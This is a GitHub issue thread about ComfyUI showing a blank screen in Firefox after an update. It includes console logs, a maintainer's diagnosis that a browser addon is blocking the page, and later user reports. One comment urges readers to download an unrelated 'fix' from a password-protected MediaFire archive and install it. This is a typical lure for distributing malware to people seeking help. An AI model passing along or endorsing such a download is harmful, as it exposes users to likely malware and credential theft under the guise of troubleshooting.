### ISSUE TITLE
Blank screen on Firefox browser after update

### ISSUE THREAD

**Issue by lodarsen** [comfyanonymous/ComfyUI#4625]
### Expected Behavior

I tried to open comfui via firefox after update

### Actual Behavior

I got a blank white screen

### Steps to Reproduce

Update comfyui and run run_nvidia_gpu.bat

### Debug Logs

```powershell
In browser network console:

TypeError: window.comfyAPI is undefined
    <anonymous> http://127.0.0.1:8188/scripts/app.js:2
lockdown-install.js:1:97687
    functors moz-extension://1b5d3f59-4890-4c6a-a5a6-6ad707c7cdf4/scripts/lockdown-install.js:1
Error: Promised response from onMessage listener went out of scope
```

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by BrechtCorbeel** [comment]
I have noticed this too on both my computers, refreshing works, but there is now also a sort of blackish overlay that appears until the workflow and comfy manager are loaded.

**Comment by ltdrdata** [comment]
> ### Expected Behavior
> 
> I tried to open comfui via firefox after update
> 
> ### Actual Behavior
> 
> I got a blank white screen
> 
> ### Steps to Reproduce
> 
> Update comfyui and run run_nvidia_gpu.bat
> 
> ### Debug Logs
> 
> ```powershell
> In browser network console:
> 
> TypeError: window.comfyAPI is undefined
>     <anonymous> http://127.0.0.1:8188/scripts/app.js:2
> lockdown-install.js:1:97687
>     functors moz-extension://1b5d3f59-4890-4c6a-a5a6-6ad707c7cdf4/scripts/lockdown-install.js:1
> Error: Promised response from onMessage listener went out of scope
> ```
> 
> 
> ### Other
> 
> _No response_

It appears that your Firefox addon is blocking the loading of ComfyUI.

**Comment by lodarsen** [comment]
It's fixed after last update of ComfyUI (nothing changed with firefox addons)

**Comment by Bartabok** [comment]
I have the same problem right now (October 2024) and all i can say is it's happening on Firefox. If i copy-paste the url on Google Chrome comfyUI appears normally.
The strange thing is i didn't install any Firefox extensions/plugins.
